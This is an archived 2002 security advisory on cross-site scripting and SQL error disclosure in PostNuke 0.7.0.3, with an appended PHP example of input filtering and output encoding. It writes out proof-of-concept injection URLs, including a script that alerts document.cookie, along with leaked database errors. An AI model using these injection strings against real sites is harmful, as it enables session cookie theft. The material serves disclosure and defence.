TUCoPS :: Web :: PHP :: web5209.htm



PostNuke various vulns
25th Mar 2002 [SBWID-5209]
COMMAND
	PostNuke various vulns
SYSTEMS AFFECTED
	PostNuke .7.0.3
PROBLEM
	rootkidd 'Scott' reported the following problems:
	
	
	http://one_of_100's_of_sites/modules.php?op=modload&name=<iframe%20src="http://www.microsoft.com"> <-- this is funny :o)
	
	
	http://one_of_100's_of_sites/index.php?catid=<script>alert(document.cookie)</script>
	
	The cookie details are displayed on the page as well as in an alert
	window, which could lead to a user's account being compromised.
	
	The text below will be shown on the web page once run.
	
	PHPLive New! 
	alert(document.cookie)&unique=1015076420651 
	border=0 
	alt='Click for Live Support!'> 
	
	We also get some cool information from site that we should not-
	
	DB Error: getArticles: 1064: You have an error in your 
	SQL syntax near '= ORDER BY nuke_stories.sid 
	DESC 
	LIMIT 1' at line 23 
	
	We also get a fully qualified path to the files we hack, allowing one
	to guess OS type and other such things.
	
	There are many bugs similar to these with pages other than the examples
	shown. Most people think it is just modules.php but this is NOT the
	case.
	
	This is an example of some other info's that can be retrieved-
	
	22/03/2002,19:32 "Fehler auf /index.php?
	xcontentmode= -> -> /index.php (linked on ) 
	Datenbankfehler: You have an error in your SQL 
	syntax near 'and scoresum>="30" order by changed 
	desc ' at line 1 Offending command was: select 
	name,id,changed,created,type,user,downloads,score
	sum,status,preview1,commentscount from content 
	and scoresum>="30" order by changed desc " 
	Error: "" Request:"/index.php?xcontentmode=" 
	Method:"GET" Agent:"Mozilla/4.0 (compatible; MSIE 
	6.0; Windows NT 5.0; T312461)" IP:"0.0.0.0" 
	Port:"32069" \n
	
	22/03/2002,19:32 "Fehler auf /index.php?
	xcontentmode= -> -> /index.php (linked on ) 
	Datenbankfehler: You have an error in your SQL 
	syntax near 'and scoresum>="30" order by changed 
	desc limit 0,10' at line 1 Offending command was: 
	select 
	name,id,changed,created,type,user,downloads,score
	sum,status,preview1,commentscount from content 
	and scoresum>="30" order by changed desc limit 
	0,10 " Error: "" Request:"/index.php?xcontentmode=" 
	Method:"GET" Agent:"Mozilla/4.0 (compatible; MSIE 
	6.0; Windows NT 5.0; T312461)" IP:"0.0.0.0" 
	Port:"32069" \n
	
SOLUTION
	 Patch
	 =====
	
	The newer .7.10 version is still vulnerable to CSS (cross-site
	scripting) and CSRF bugs in some manner or another. The other bugs
	are patched.
	
	Also use "strip_tags($Evil_halt, "acceptable html ");", filter
	unwanted code being passed to the server, add <>, cookie and other
	such characters / words to your snort config and finally DISABLE error
	reporting in php.ini.
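
The input filtering and error-reporting advice above, as an added PHP example that is not part of the original advisory or of PostNuke's code. The helper names (clean_catid, clean_module_name, html), the assumption that catid is a numeric id, and the sample inputs are constructed for illustration; the last line shows that strip_tags() with allowed tags leaves their attributes in place, so it does not replace output encoding.

```php
<?php
// Added example: hypothetical helpers, not PostNuke code.

// Log errors server-side; never send SQL errors or file paths to the client
// (php.ini equivalents: display_errors = Off, log_errors = On).
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Assumption: catid is a numeric category id, so accept short digit strings only.
function clean_catid($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// A module name selects code to load: allow a conservative character set.
function clean_module_name($raw): ?string
{
    if (!is_string($raw) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw)) {
        return null;
    }
    return $raw;
}

// Encode anything echoed into HTML at output time.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs modelled on the two requests in the report.
$samples = [
    ['catid', '12'],
    ['catid', '<script>alert(document.cookie)</script>'],
    ['name',  'News'],
    ['name',  '<iframe src="http://www.microsoft.com">'],
];

foreach ($samples as [$param, $value]) {
    $ok = $param === 'catid' ? clean_catid($value) : clean_module_name($value);
    printf("%-5s %-8s %s\n", $param, $ok === null ? 'REJECT' : 'ACCEPT', html($value));
}

// strip_tags() with an allow-list removes other tags but keeps every
// attribute of the allowed ones, so the event handler below survives it.
echo html(strip_tags('<b onmouseover="alert(1)">hi</b>', '<b>')), "\n";
```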
